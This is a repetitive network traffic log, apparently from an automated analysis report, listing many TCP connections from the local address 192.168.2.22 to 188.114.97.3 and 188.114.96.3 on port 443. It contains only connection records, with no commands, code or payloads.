            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
